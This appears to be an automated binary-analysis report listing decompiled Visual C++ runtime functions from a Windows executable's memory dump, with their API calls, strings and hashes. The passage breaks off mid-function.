0x00406a3c
0x00406a3c
0x00406a41
0x00406a4c
0x00406a5c
0x00406a5e
0x00406a63
0x00000000
0x00406a69
0x00406a69
0x00406a74
0x00406a79
0x00406a7e
0x00406a81
0x00406a9d
0x00000000
0x00406a9f
0x00406aa3
0x00406ab6
0x00000000
0x00406ab8
0x00406aca
0x00406acc
0x00406ad1
0x00000000
0x00406ad3
0x00406ad7
0x00406b19
0x00406b28
0x00406b2d
0x00406b30
0x00406b32
0x00406b35
0x00406b4f
0x00000000
0x00406b69
0x00406b6c
0x00406b6d
0x00406b6e
0x00406b74
0x00406b77
0x00406b70
0x00406b70
0x00406b71
0x00406b71
0x00406b8a
0x00406b8e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b8e
0x00406ad9
0x00406adc
0x00406b94
0x00406b94
0x00000000
0x00000000
0x00000000
0x00406adc
0x00406ad7
0x00406ad1
0x00406ab6
0x00406a9d
0x00406a63
0x00406a0c
0x00406a12
0x00406a1e
0x00406a1e
0x004069a7
0x004069a7
0x004069a8
0x004069ab
0x004069c1
0x004069dd
0x00406b05
0x00406b05
0x004069e3
0x004069e3
0x00000000
0x004069e3
0x004069c3
0x004069c3
0x00000000
0x004069c3
0x004069c1
0x00406b0d
0x00406b18

APIs

LCMapStringW.KERNEL32(00000000,00000100,00408580,00000001,00000000,00000000,74B070F0,0040D2CC,?,?,?,00406D69,?,?,?,00000000), ref: 004069B9
LCMapStringA.KERNEL32(00000000,00000100,0040857C,00000001,00000000,00000000,?,?,00406D69,?,?,?,00000000,00000001), ref: 004069D5
LCMapStringA.KERNEL32(?,?,?,im@,?,?,74B070F0,0040D2CC,?,?,?,00406D69,?,?,?,00000000), ref: 00406A1E
MultiByteToWideChar.KERNEL32(0000000A,00000001,?,im@,00000000,00000000,74B070F0,0040D2CC,?,?,?,00406D69,?,?,?,00000000), ref: 00406A56
MultiByteToWideChar.KERNEL32(0000000A,00000001,?,?,00000000,00000000,?,?,00406D69,?,?,?,00000000,00000001), ref: 00406AAE
LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00406D69,?,?,?,00000000,00000001), ref: 00406AC4
LCMapStringW.KERNEL32(?,?,00000000,00000000,?,?,?,?,00406D69,?,?,?,00000000,00000001), ref: 00406AF7
LCMapStringW.KERNEL32(?,?,00000000,?,?,00000000,?,?,00406D69,?,?,?,00000000,00000001), ref: 00406B5F

Strings

im@, xrefs: 00406A41, 00406AA3, 00406A12, 004069F2

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: String$ByteCharMultiWide
String ID: im@
API String ID: 352835431-516455879
Opcode ID: 8a457b7e73b24e4e40280a2acb46e0260d37479b9dabf4ec8de93e9f59a3a168
Instruction ID: 2a4d77afa9b8c108bc5d31cbd1747e251eb85bcd4f48f011147df78ac0835706
Opcode Fuzzy Hash: 8a457b7e73b24e4e40280a2acb46e0260d37479b9dabf4ec8de93e9f59a3a168
Instruction Fuzzy Hash: AC517D72900219EBDF228F94CE45E9F7FB5FB48740F12412AF912B12A0D7399D21DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040397F, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040397F() {
				int _v4;
				int _v8;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x40d0a8; // 0x1
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
								_t39 = E004028B0(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E00405EB0(_t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = E004028B0(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										_t4 =  &_v8; // 0x402723
										E004027C7( *_t4);
										_v8 = _t32;
									}
									_t6 =  &_v8; // 0x402723
									_t32 =  *_t6;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x40d0a8 = 2;
					goto L18;
				}
				 *0x40d0a8 = 1;
				goto L6;
			}

0x00403981
0x00403990
0x00403992
0x00403994
0x00403998
0x004039d0
0x00403a5a
0x00403aa8
0x00000000
0x00403aa8
0x00403a5c
0x00403a5e
0x00403a6c
0x00403a6e
0x00403a70
0x00403a7c
0x00403a7f
0x00403a87
0x00403a8c
0x00403a95
0x00403a8e
0x00403a8e
0x00403a8e
0x00403a9e
0x00000000
0x00000000
0x00000000
0x00000000
0x00403a72
0x00403a72
0x00403a72
0x00403a72
0x00403a73
0x00403a77
0x00403a78
0x00000000
0x00403a72
0x00403a66
0x00403a6a
0x00000000
0x00000000
0x00000000
0x00403a6a
0x004039d6
0x004039d8
0x004039e6
0x004039e9
0x004039eb
0x004039fb
0x00403a07
0x00403a0e
0x00403a14
0x00403a18
0x00403a1b
0x00403a23
0x00403a27
0x00403a38
0x00403a3a
0x00403a3e
0x00403a44
0x00403a44
0x00403a48
0x00403a48
0x00403a48
0x00403a27
0x00403a4d
0x00000000
0x00000000
0x00000000
0x00000000
0x004039ed
0x004039ed
0x004039ed
0x004039ee
0x004039ef
0x004039f5
0x004039f6
0x00000000
0x004039ed
0x004039dc
0x004039e0
0x00000000
0x00000000
0x00000000
0x004039e0
0x0040399c
0x004039a0
0x004039b4
0x004039b8
0x00000000
0x00000000
0x004039be
0x00000000
0x004039be
0x004039a2
0x00000000

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00402723), ref: 0040399A
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,00402723), ref: 004039AE
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00402723), ref: 004039DA
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00402723), ref: 00403A12
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00402723), ref: 00403A34
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,?,00402723), ref: 00403A4D
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,00402723), ref: 00403A60
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403A9E

Strings

#'@, xrefs: 00403A48, 00403A3A

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID: #'@
API String ID: 1823725401-1767101022
Opcode ID: 3341c1a57459a73859af4784913d8ac99d631b977b33b036abde2fc917227607
Instruction ID: f5652d793e8a303b426e6c873959b91cf511c8cf900961b60ba665e253fcd195
Opcode Fuzzy Hash: 3341c1a57459a73859af4784913d8ac99d631b977b33b036abde2fc917227607
Instruction Fuzzy Hash: 693126B26042156ED7207F785C8483B7E9CE64531A711053FF6C5F3280EA7D8E458A6D

Uniqueness

Uniqueness Score: -1.00%

Function 004065CF, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E004065CF(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x40d128 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x40d12c; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x40d130; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x40d128(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x40d128 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x40d12c = GetProcAddress(_t15, "GetActiveWindow");
					 *0x40d130 = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}

0x004065d0
0x004065d2
0x004065da
0x0040661e
0x0040661e
0x00406625
0x00406629
0x0040662d
0x0040662f
0x00406636
0x0040663b
0x0040663b
0x00406636
0x0040662d
0x00000000
0x0040664a
0x004065e7
0x004065eb
0x00406654
0x00000000
0x00406654
0x004065f9
0x004065fd
0x00406602
0x00000000
0x00406604
0x00406612
0x00406619
0x00000000
0x00406619

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,0040407D,?,Microsoft Visual C++ Runtime Library,00012010,?,0040849C,?,004084EC,?,?,?,Runtime Error!Program: ), ref: 004065E1
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004065F9
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0040660A
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00406617

Strings

user32.dll, xrefs: 004065DC
GetLastActivePopup, xrefs: 0040660C
GetActiveWindow, xrefs: 00406604
MessageBoxA, xrefs: 004065F3

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: de83a2be77e068634bcef9c668b0e23e5eba04819015b72b58bffe3a3692adde
Instruction ID: 83f7932c51d6a374e982478866309ad6b68881d6535d80d4b0c2913e8dc1c594
Opcode Fuzzy Hash: de83a2be77e068634bcef9c668b0e23e5eba04819015b72b58bffe3a3692adde
Instruction Fuzzy Hash: 30014871A003116FC7109FF55E80A2B3AE9AB58754715083FE681F6291DE7AC8698B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00406BC6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00406BC6(int _a4, char* _a8, int _a12, char _a16, int _a20, int _a24, signed int _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x4085a0);
				_push(E00403E48);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x40d16c; // 0x1
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x40d160; // 0x0
								_a20 = _t44;
							}
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E004065A0(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E00406760(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t26 =  &_a16; // 0x406d69
										_t32 = GetStringTypeW(_a4, _t60, _t43,  *_t26);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x40d150; // 0x0
						}
						_t5 =  &_a16; // 0x406d69
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12,  *_t5);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x408580, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x40857c, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x40d16c = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}

0x00406bc9
0x00406bcb
0x00406bd0
0x00406bdb
0x00406bdc
0x00406be3
0x00406be9
0x00406bec
0x00406bf5
0x00406c35
0x00406c38
0x00406c61
0x00000000
0x00406c67
0x00406c6a
0x00406c6c
0x00406c71
0x00406c71
0x00406c81
0x00406c8b
0x00406c91
0x00406c96
0x00000000
0x00406c98
0x00406c98
0x00406ca5
0x00406caa
0x00406cad
0x00406caf
0x00406cb5
0x00406cca
0x00406cd0
0x00000000
0x00406cd2
0x00406ce1
0x00406ce9
0x00000000
0x00406ceb
0x00406ceb
0x00406cf3
0x00406cf3
0x00406ce9
0x00406cd0
0x00406c96
0x00406c3a
0x00406c3a
0x00406c3f
0x00406c41
0x00406c41
0x00406c46
0x00406c53
0x00406c53
0x00406bf7
0x00406bfa
0x00406bfd
0x00406c0d
0x00406c27
0x00406cfb
0x00406cfb
0x00406c2d
0x00406c2f
0x00000000
0x00406c2f
0x00406c0f
0x00406c0f
0x00406c30
0x00406c30
0x00000000
0x00406c30
0x00406c0d
0x00406d03
0x00406d0e

APIs

GetStringTypeW.KERNEL32(00000001,00408580,00000001,?,74B070F0,0040D2CC,?,?,00406D69,?,?,?,00000000,00000001), ref: 00406C05
GetStringTypeA.KERNEL32(00000000,00000001,0040857C,00000001,?,?,00406D69,?,?,?,00000000,00000001), ref: 00406C1F
GetStringTypeA.KERNEL32(?,?,?,?,im@,74B070F0,0040D2CC,?,?,00406D69,?,?,?,00000000,00000001), ref: 00406C53
MultiByteToWideChar.KERNEL32(?,0040D2CD,?,?,00000000,00000000,74B070F0,0040D2CC,?,?,00406D69,?,?,?,00000000,00000001), ref: 00406C8B
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00406D69,?), ref: 00406CE1
GetStringTypeW.KERNEL32(?,?,00000000,im@,?,?,?,?,?,?,00406D69,?), ref: 00406CF3

Strings

im@, xrefs: 00406CEB, 00406C46

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: StringType$ByteCharMultiWide
String ID: im@
API String ID: 3852931651-516455879
Opcode ID: aa4cadf7cfa75ac633d5b16c5f04e0b422b5bbe2a1122a409a3cb72880d02710
Instruction ID: 2f91fd96ec1caaad158210ff2546905f1279b3099ab82f1085c8bbf768e305b8
Opcode Fuzzy Hash: aa4cadf7cfa75ac633d5b16c5f04e0b422b5bbe2a1122a409a3cb72880d02710
Instruction Fuzzy Hash: 3C418F72904219AFDF209F94CE85EAB3F79EB09750F11443AF942F6290C73889649B98

Uniqueness

Uniqueness Score: -1.00%

Function 00403F59, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00403F59(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x40a1b8;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x40a248) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x40a1b8; // 0x9c000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x40cf5c; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x40a0f0 == 1) {
						_t16 = _t54 + 0x40a1bc; // 0x40849c
						_t56 = _t16;
						_t19 = E00405A40( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E00405950( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(E00405A40( &_v424) + 1 > 0x3c) {
								_t49 = E00405A40( &_v424) +  &_v424 - 0x3b;
								E00406660(E00405A40( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E00405950( &_v164, "Runtime Error!\n\nProgram: ");
							E00405960( &_v164, _t49);
							E00405960( &_v164, "\n\n");
							_t12 = _t54 + 0x40a1bc; // 0x40849c
							E00405960( &_v164,  *_t12);
							_t17 = E004065CF( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}

0x00403f59
0x00403f62
0x00403f65
0x00403f67
0x00403f6c
0x00403f70
0x00403f73
0x00403f79
0x00000000
0x00000000
0x00000000
0x00403f79
0x00403f7e
0x00403f81
0x00403f87
0x00403f8d
0x00403f95
0x00404086
0x00404086
0x00404091
0x004040a3
0x00403fac
0x00403fb2
0x00403fce
0x00403fdc
0x00403fe2
0x00403fe9
0x00403feb
0x00403ffb
0x00404016
0x0040401e
0x00404023
0x00404023
0x00404032
0x0040403f
0x00404050
0x00404055
0x00404062
0x00404078
0x00404080
0x00403fb2
0x00403f95
0x004040ab

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 00403FC6
GetStdHandle.KERNEL32(000000F4,0040849C,00000000,00000000,00000000,?), ref: 0040409C
WriteFile.KERNEL32(00000000), ref: 004040A3

Strings

Runtime Error!Program: , xrefs: 0040402C
..., xrefs: 00404018
<program name unknown>, xrefs: 00403FD6
Microsoft Visual C++ Runtime Library, xrefs: 00404072

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: fb714fd2fd84cf47c5d1d83e84c7a0565c6906bd1b523a80d06c87d0e0a38aee
Instruction ID: 06ffa35383d9a88922160bd9055ef7756765bd06e59f71b4b378d566b4e15569
Opcode Fuzzy Hash: fb714fd2fd84cf47c5d1d83e84c7a0565c6906bd1b523a80d06c87d0e0a38aee
Instruction Fuzzy Hash: 43310AB1A00209AFDF20EA60CE45F9B376CEB85304F54057FF685F60C1E6789A548E5E

Uniqueness

Uniqueness Score: -1.00%

Function 00403C9A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00403C9A(void* __ecx, void* __eflags) {
				char _v8;
				struct _OSVERSIONINFOA _v156;
				char _v416;
				char _v4656;
				void* _t24;
				CHAR* _t32;
				void* _t33;
				intOrPtr* _t34;
				void* _t35;
				char _t36;
				char _t38;
				void* _t40;
				char* _t44;
				char* _t45;
				char* _t50;

				E004065A0(0x122c, __ecx);
				_v156.dwOSVersionInfoSize = 0x94;
				if(GetVersionExA( &_v156) != 0 && _v156.dwPlatformId == 2 && _v156.dwMajorVersion >= 5) {
					_t40 = 1;
					return _t40;
				}
				if(GetEnvironmentVariableA("__MSVCRT_HEAP_SELECT",  &_v4656, 0x1090) == 0) {
					L28:
					_t24 = E00403C6D( &_v8);
					asm("sbb eax, eax");
					return _t24 + 3;
				}
				_t44 =  &_v4656;
				if(_v4656 != 0) {
					do {
						_t38 =  *_t44;
						if(_t38 >= 0x61 && _t38 <= 0x7a) {
							 *_t44 = _t38 - 0x20;
						}
						_t44 = _t44 + 1;
					} while ( *_t44 != 0);
				}
				if(E00406560("__GLOBAL_HEAP_SELECTED",  &_v4656, 0x16) != 0) {
					GetModuleFileNameA(0,  &_v416, 0x104);
					_t45 =  &_v416;
					if(_v416 != 0) {
						do {
							_t36 =  *_t45;
							if(_t36 >= 0x61 && _t36 <= 0x7a) {
								 *_t45 = _t36 - 0x20;
							}
							_t45 = _t45 + 1;
						} while ( *_t45 != 0);
					}
					_t32 = E004064E0( &_v4656,  &_v416);
				} else {
					_t32 =  &_v4656;
				}
				if(_t32 == 0) {
					goto L28;
				}
				_t33 = E00406420(_t32, 0x2c);
				if(_t33 == 0) {
					goto L28;
				}
				_t34 = _t33 + 1;
				_t50 = _t34;
				if( *_t34 != 0) {
					do {
						if( *_t50 != 0x3b) {
							_t50 = _t50 + 1;
						} else {
							 *_t50 = 0;
						}
					} while ( *_t50 != 0);
				}
				_t35 = E004061E5(_t34, 0, 0xa);
				if(_t35 != 2 && _t35 != 3 && _t35 != 1) {
					goto L28;
				}
				return _t35;
			}

0x00403ca2
0x00403caf
0x00403cc1
0x00403cd7
0x00000000
0x00403cd7
0x00403cf6
0x00403dcc
0x00403dd0
0x00403dda
0x00000000
0x00403ddc
0x00403cfe
0x00403d0a
0x00403d0c
0x00403d0c
0x00403d10
0x00403d18
0x00403d18
0x00403d1a
0x00403d1b
0x00403d0c
0x00403d37
0x00403d4e
0x00403d5a
0x00403d60
0x00403d62
0x00403d62
0x00403d66
0x00403d6e
0x00403d6e
0x00403d70
0x00403d71
0x00403d62
0x00403d83
0x00403d39
0x00403d39
0x00403d39
0x00403d8c
0x00000000
0x00000000
0x00403d91
0x00403d9a
0x00000000
0x00000000
0x00403d9c
0x00403d9d
0x00403da1
0x00403da3
0x00403da6
0x00403dac
0x00403da8
0x00403da8
0x00403da8
0x00403dad
0x00403da3
0x00403db5
0x00403dc0
0x00000000
0x00000000
0x00403de1

APIs

GetVersionExA.KERNEL32 ref: 00403CB9
GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403CEE
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403D4E

Strings

__MSVCRT_HEAP_SELECT, xrefs: 00403CE9
__GLOBAL_HEAP_SELECTED, xrefs: 00403D28

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentFileModuleNameVariableVersion
String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
API String ID: 1385375860-4131005785
Opcode ID: db2cf84cef6e4ca526c92d22917466c07231cabb2b10c38645a922e115710fe6
Instruction ID: 6b48864dc7d8bf44961b0047765e0fa03d25ab882a242757e95373b9dc370530
Opcode Fuzzy Hash: db2cf84cef6e4ca526c92d22917466c07231cabb2b10c38645a922e115710fe6
Instruction Fuzzy Hash: 7631C4719152486AEB319B706C45ADA3F6C9F02745F2404FBE186F62C2E6389F898B19

Uniqueness

Uniqueness Score: -1.00%

Function 004076F0, Relevance: 7.5, APIs: 5, Instructions: 45
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E004076F0(void* __ecx, CHAR* _a4) {
				void* _v12;
				int _t11;
				signed int _t13;
				void* _t16;
				short* _t17;
				int _t19;
				short* _t21;

				_t16 = __ecx;
				if(_a4 != 0) {
					_t19 = lstrlenA(_a4) + 1;
					E004065A0(_t19 + _t19 + 0x00000003 & 0x000000fc, _t16);
					_t17 = _t21;
					 *_t17 =  *_t17 & 0x00000000;
					_t11 = MultiByteToWideChar(0, 0, _a4, 0xffffffff, _t17, _t19);
					if(_t11 == 0) {
						if(GetLastError() == 0) {
							_t13 = 0;
						} else {
							_t13 = GetLastError() & 0x0000ffff | 0x80070000;
						}
						_t11 = E00407643(_t13);
					}
					__imp__#2(_t17);
				} else {
					_t11 = 0;
				}
				return _t11;
			}

0x004076f0
0x004076f9
0x0040770a
0x00407713
0x00407718
0x00407721
0x00407729
0x00407731
0x0040773d
0x0040774d
0x0040773f
0x00407746
0x00407746
0x00407750
0x00407750
0x00407756
0x004076fb
0x004076fb
0x004076fb
0x00407762

APIs

lstrlenA.KERNEL32(00000000,?,00000000,?,00401AD9,?), ref: 00407702
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000001,?,00401AD9,?), ref: 00407729
GetLastError.KERNEL32(?,00000001,?,00401AD9,?), ref: 00407739
GetLastError.KERNEL32(?,00000001,?,00401AD9,?), ref: 0040773F
SysAllocString.OLEAUT32 ref: 00407756

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$AllocByteCharMultiStringWidelstrlen
String ID:
API String ID: 4196186757-0
Opcode ID: 6ce2ed62ded74dccbb6eb9b89eee8ed20c853a7e70faccaab52c55498a9cd21f
Instruction ID: dd3736e67c035bfa9f64773910011d18f4ce9904b85c1e7db6edaaa3cbea6a3a
Opcode Fuzzy Hash: 6ce2ed62ded74dccbb6eb9b89eee8ed20c853a7e70faccaab52c55498a9cd21f
Instruction Fuzzy Hash: B4012832944516E7CB202B21DD06BAB3FA8EF413B0F200436F945F61D0EB78F61586AE

Uniqueness

Uniqueness Score: -1.00%

Function 004032C3, Relevance: 7.5, APIs: 5, Instructions: 38
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004032C3() {
				void _t10;
				long _t15;
				void* _t16;

				_t15 = GetLastError();
				_t16 = TlsGetValue( *0x40a100);
				if(_t16 == 0) {
					_t16 = E004057F5(1, 0x74);
					if(_t16 == 0 || TlsSetValue( *0x40a100, _t16) == 0) {
						E0040277E(0x10);
					} else {
						E004032B0(_t16);
						_t10 = GetCurrentThreadId();
